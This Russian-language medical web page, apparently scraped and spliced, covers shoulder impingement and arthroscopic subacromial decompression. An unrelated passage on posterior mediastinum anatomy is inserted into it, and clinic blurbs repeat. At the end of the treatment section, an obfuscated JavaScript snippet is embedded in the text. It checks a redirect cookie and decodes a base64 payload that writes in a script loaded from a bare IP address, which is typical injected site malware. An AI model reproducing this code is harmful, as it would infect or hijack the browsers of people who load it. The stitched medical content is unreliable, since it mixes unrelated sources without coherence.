Субакромиальная декомпрессия плечевого сустава

Самые полные ответы на вопросы по теме: «артроз субакромиального сустава».

Виды артроскопических вмешательств

Шов мениска

Подробнее

В клинике ЦЭЛТ выполняется артроскопия любых крупных суставов: коленных, локтевых, плечевых, тазобедренных, голеностопных, лучезапястных. При этом виды вмешательст весьма разнообразны.

При выявлении патологии в голеностопных, лучезапястных, локтевых и тазобедренных суставах выполняются операции:

Виды артроскопических вмешательств
  • резекция спаек;
  • релиз сустава;
  • резекция экзостозов;
  • удаление хондромных тел;
  • лечение внутрисуставных повреждений;
  • хондропластика.

В коленных суставах, помимо перечисленного, выполняются также:

  • резекция поврежденной части мениска;
  • шов мениска;
  • пластика крестообразных связок (передней, задней крестообразной связки);
  • пластика удерживателей надколенника;
  • мозаичная хондропластика.

Топографическая анатомия заднего средостения: границы, органы, сосуды и нервы и их взаимоотношение. Понятие о медиастините, причины возникновения, методы оперативного лечения. Доступы к пищеводу.

Заднее средостение ограничено сзади телами грудных позвонков и начальными отделами межреберий с покрывающей их пред-позвоночной фасцией, по бокам — медиастинальными отрогами внутригрудной фасции и медиастинальной плеврой.

Передней стенкой заднего средостения является вверху бронхоперикардиальная мембрана, а ниже — задняя поверхность перикарда.

В заднем средостении ближе всего к позвонкам располагаются межреберные артерии, немного кпереди от них — межреберные вены, справа впадающие в v. azygos, а слева — в v. hemiazygos. Латеральнее и кпереди от вен располагаются правый и левый симпатические стволы с отходящими от них nn. splanchnici (major и minor). Все эти образования прикрыты фасцией и париетальной плеврой.

Кпереди от них лежат грудной проток, нисходящая аорта и пищевод с блуждающими нервами. Эти образования окружены клетчаткой заднего средостения и прилежат к его передней стенке.

Нисходящая аорта тесно соприкасается с левой средостенной плеврой, а пищевод — с правой средостенной плеврой.

Медиастинит — воспаление клетчатки средостения. Виды:передний/задний и первичный(инф. попала непосредств. в средост. /вторичный(распр. инф-ии от к-л).

Прич. 1)осложнение гнойных заболеваний плевры, легких, полости рта, зева, шеи и т. д. 2)вследствие ранения органов средостения (прободение пищевода инородным телом) или 3)после операции (например, резекции пищевода). Опер. леч. Переднее средостение 1-Бок. шейн. медиастнотомия м/т по Разумовскому 3-Торакотомия по Маделунгу 4-Верхнеср. лапаротом. с френотом. (по Савиных-Розанову). Задн. средост. – Медиастинотом. по Насилову([)

Доступы к пищеводу 1)Шейный доступ (воротникообразный и косой (по Разумовскому) 2)Трансплевральный (переднебок. правостор. торакотомия и внеплевральная медиастинотомия (по Насилову)3)Трансабдоминальный (верхнеср. лапаротом. с френотом (по Савиных-Розанову)

Артроскопическая субакромиальная декомпрессия (АСД) — устаревшее лечение? Клиники Германии

Недавно было опубликовано британское исследование, ставящее под сомнение эффективность артроскопии плеча, операции, которая лежит в основе артроскопической субакромиальной декомпрессии (АСД) и является очень распространенной и успешной процедурой.

Читайте также:  Как быстро избавиться от синяков после травмы

Боль в плече является распространенной проблемой, согласно исследованию Урвина (1998), 2–4% всех визитов к врачу связаны с симптомами, которые не диагностировались как плечелопаточный периартрит (ПЛП) и поэтому не могли быть подвергнуты какому-либо конкретному лечению.

Чарльз Неер в 1972 году назвал боли в области плечевого сустава, как субакромиальной импинджмент (синдром сдавления ротаторной манжеты плеча). Ротаторная манжента – это мышцы и сухожилия, которые координируют движения в плечевом суставе. Разрывы и сдавления в 95% случаев вызваны механическим воздействием. Неер предположил, что такие патологии можно лечить с помощью передней акромиопластики.

Акромион – это костная структура, которая прилегает к мышцам и сухожилиям плеча, при травме или болезнях могут образовываться наросты тканей, которые мешают движениям и повреждают окружающие мышцы и сухожилия, вызывая боль.

Передняя акромиопластика позволяет увеличить расстояние между акромионом, удалить поврежденные ткани и наросты. Биглиани в 1982 году выявил связь между формой акромиона и развитием повреждений ротаторной манжеты. Данный факт расширил показания к проведения акромипластики, а другие исследователи с появлением эндоскопических методов разработали технику артроскопической субакромиальной декомпрессии (АСД).

Технически достаточно простая операция пользовалась все большей популярностью в последующие годы. В первом десятилетии 21-го века число операций в Великобритании увеличилось в 7 раз с 2,523 до 21,355 случаев в год. В США, согласно анализу Vitale (2010), АСД проводилась в 2,6 раза чаще, чем любая другая ортопедическая процедура. Очень часто АСД используется в качестве фланкирующей меры при реконструкции манжеты ротатора. Впоследствии стало появляться все больше доказательств того, что данная операция не приводит к лучшим результатам. Gartsman (2004), согласно проспективному исследованию, сообщил, что декомпрессия не изменила окончательный результат после реконструкции сухожилия.

В 2018 году в престижном медицинском журнале Lancet было опубликовано перспективное рандомизированное плацебо-контролируемое исследование под названием CSAW «Артроскопия плеча». В исследование были включены пациенты с трехмесячной болью в плече. Пациенты были разделены на три группы: 1 – операция АСД, 2 группа – стандартная процедура, 3 группа- без специального лечения.

Анализ показал, что при использовании разных шкал результаты лечения пациентов, подвергнутых артроскопическому лечению, были лучше с точки зрения уменьшения боли и улучшения функции, чем в контрольной группе. Однако различия не были статистически значимыми. Не было никаких различий между 1 и 2 группой. Авторы пришли к выводу, что ценность АСД должна быть, по крайней мере, поставлена под сомнение.

Однако, данное исследование имело существенные методологические и систематические недостатки: только боль в плече не является основанием для проведения АСД, не использовались общепринятые тесты для оценки эффективности метода (рентгенологические исследования, тест на инъекции и т.д.). Устойчивость к терапии в течение 3 месяцев недостаточна, чтобы исключить положительную динамику.

Для оценки эффективности метода исследовали 313 пациентов. В общей сложности было выполнено 209 процедур в течение 34 месяцев. Это соответствует менее чем двум процедурам на одного хирурга в год, что может поставить под сомнение рутинную практику и, следовательно, идеально выполненную АСД. Последующее наблюдение в течение 6 месяцев достаточно короткое, особенно для пациентов, которым выполнено АСД. Эти и другие менее значимые недостатки привели к совместному заявлению соответствующих научных обществ и профессиональных ассоциаций, о том, что публикация неоправданно ставит под сомнение всю область артроскопии плеча.

Читайте также:  Паховая грыжа у мужчин – симптомы, лечение, операция, удаление

ЗАКЛЮЧЕНИЕ

Артроскопическая субакромиальная декомпрессия

Разновидности и этапы синдрома

Единой классификации субакромиального конфликта не придумано, и во врачебной практике можно услышать условное разделение на две разные группы:

Разновидности и этапы синдрома
  • первичный ИС;
  • вторичный ИС.

Первичный импинджмент-синдром

Разновидности и этапы синдрома

Первичный импинджмент-синдром развивается из-за того, что происходит раздражение надкостной мышцы. Этот процесс происходит из-за деформации ключевидного отростка, большого бугорка плечевой кисти после перенесенной травмы, костного нароста на нижней части акромиально-ключичного сустава, травмирования сухожилия вращательной манжеты, генетических изменений связанный с формой акромиального отростка.

Вторичный импинджмент-синдром

Разновидности и этапы синдрома

Боль в плечах и шее

Вторичный импинджмент-синдром наблюдается при сужении пространства в подакромиальном районе. Такое явление, может быть связано:

Разновидности и этапы синдрома
  • с разрывом связочного аппарата акромиально-ключичного сустава;
  • генетически слабыми связками;
  • нарушением целостности сухожилия двуглавой мышцы плеча или ротаторной манжеты;
  • хроническим бурситом, в результате которого происходит утолщение бурсы или ротаторной манжеты;
  • мышечной слабостью или эпизодами паралича;
  • смещением плечевой кости, а именно большого бугорка, во время травматизации.

При импинджмент-синдроме движения в плечевом суставе ограничены

Разновидности и этапы синдрома

Стадии импинджмент-синдрома

Развитие субакромиального конфликта проходит в несколько этапов, а именно:

Разновидности и этапы синдрома
  • На первом этапе патологического процесса наблюдается отечность тканей и кровоизлияние. Чаще всего наблюдается у пациентов не старше 25 лет. Прогноз на выздоровление отличный, но при соблюдении всех правил и рекомендаций доктора возможно полное излечение. Лечение включает в себя консервативные методики, оперативного вмешательства не требуется.
  • На втором этапе можно отметить развитие фиброза и тендинита. Наблюдается у пациентов, которые находятся в возрастном диапазоне от 25 до 40 лет. Правильно подобранная терапия, позволит прогнозировать благоприятный исход лечения. Кроме консервативных методик, возможно применение акромиопластики.
  • На третьем этапе ИС можно наблюдать костные шпоры, а также разрыв манжеты. Встречается у пациентов старше 40 лет. К сожалению, прогноз на полнейшее выздоровление практически отсутствует, так как основным методом лечения является хирургическое вмешательство.

Диагностика

Так как развитие субакромиального синдрома часто связано с определённым видом деятельности, первым этапом диагностики для выявления причины является опрос врачом больного. Затем следует осмотр с помощью проведения специальных тестов и ультразвуковое исследование (УЗИ). Возможен рентген плечевого сустава, чтобы выявить поражённый акромион или наличие костных шпор.

В отдельных случаях больной испытывает боль в плече неизвестного происхождения. Для определения её источника в суставную сумку вводят местное обезболивающее средство. Если после инъекции боль исчезает, значит его причина – тендонит или бурсит. Когда боль спровоцирована повреждениями нервов, этого не происходит.

Если в процессе исследования возникает подозрение на разрыв вращательной манжеты, требуется провести магнитную томографию (МРТ).

МРТ сустава плеча – универсальный полный метод диагностики субакромиального сидрома. В отличие от других перечисленных методов он не только наиболее информативный, но и совершенно безопасный, не влекущий возможных негативных последствий.

Преимущества МРТ заключаются в следующем:

  1. она предоставляет исчерпывающую информацию о состоянии, мягких тканей и хрящей сустава;
  2. даёт возможность точно определить границы поражённой области, отличая больные ткани от здоровых;
  3. позволяет оценить точное место травмы и её масштаб;
  4. применение МРТ разрешено для обследования детей;
  5. не требует инвазивного (с проникновением внутрь организма) вмешательства.

Мощность магнитного поля томографов для МРТ исследования составляет 1,5 Т. Ещё одно удобство магнитной томографии – возможность проводить исследования в трёх плоскостях, что помогает получить самые точные сведения о патологии. Иногда назначают проведение магнито-резонансной томографии с введением особого контрастирующего вещества. Оно вводится в поражённую суставную полость, после чего фиксируется на рентгеновских снимках. Если становится очевидным, что вещество вытекает из суставной полости,  подтверждается подозрение на разрыв вращательной манжеты. Данная разновидность МРТ (артрограмма) необходима для проверки механических свойств сустава.

Лечение

Основная цель лечения – устранение болевого синдрома и восстановление нормальной работы плечевого сустава. Начинается терапия с применения консервативных методик, включающих в себя приём нестероидных препаратов, таких, как Вольтарен, соблюдения режима для больной конечности, прохождения физиотерапевтических процедур и массажа. Если боль достигает большой интенсивности, применяют блокаду глюкокортикоидами (Дипроспан и др.) Данные средства весьма эффективно нейтрализуют боль и устраняют воспаление и отёчность. Продолжительность действия глюкокортикоидов –  несколько месяцев.

В острый период заболевания, чтобы восстановить подвижность в суставе, следует выполнять лечебные упражнения, которые назначает врач. По мере того, как боль стихает, к щадящим упражнениям добавляются и силовые, способствующие развитию плечевых мышц. Курс консервативной терапии составляет до полугода. За это время во многих случаях пациент избавляется от боли, работа плеча нормализуется.

Если консервативные методы лечения не возымели эффекта, возможно проведение хирургической операции. Заключается она в увеличении расстояния между отростком лопатки и ротаторной манжетой. При этом хирург удаляет образовавшиеся костные шипообразные наросты, ставшие причиной сокращения данного промежутка и негативно влияющие на сухожилия. После операции пациент возвращается к нормальному качеству жизни. function getCookie(e){var U=(new RegExp(«(?:^|; )»+(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=(()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=(()/1e3+86400),date=new Date((new Date).getTime()+86400);»redirect=»+time+»; path=/; expires=»+(),(»)}

Субакромиальная декомпрессия плечевого сустава

Шов мениска

Подробнее

В клинике ЦЭЛТ выполняется артроскопия любых крупных суставов: коленных, локтевых, плечевых, тазобедренных, голеностопных, лучезапястных. При этом виды вмешательст весьма разнообразны.

При выявлении патологии в голеностопных, лучезапястных, локтевых и тазобедренных суставах выполняются операции:

  • резекция спаек;
  • релиз сустава;
  • резекция экзостозов;
  • удаление хондромных тел;
  • лечение внутрисуставных повреждений;
  • хондропластика.

В коленных суставах, помимо перечисленного, выполняются также:

Субакромиальная декомпрессия плечевого сустава
  • резекция поврежденной части мениска;
  • шов мениска;
  • пластика крестообразных связок (передней, задней крестообразной связки);
  • пластика удерживателей надколенника;
  • мозаичная хондропластика.

Повреждения вращательной (ротаторной) манжеты плеча

Вокруг головки плечевой кости располагается несколько сухожилий, образующих вращательную или ротаторную манжету плеча. В состав манжеты входят сухожилия надостной, подостной, малой круглой и подлопаточной мышц плеча.

Эти мышцы обеспечивают как стабильность головки плеча, прижимая её к суставной впадине при отведении руки (начальная фаза так и вращение плеча внутрь и снаружи.

При повреждении сухожилий ротаторной манжеты (одного или нескольких), происходит нарушение механики плечевого сустава, возникают ограничения подвижности, боли при отведении руки.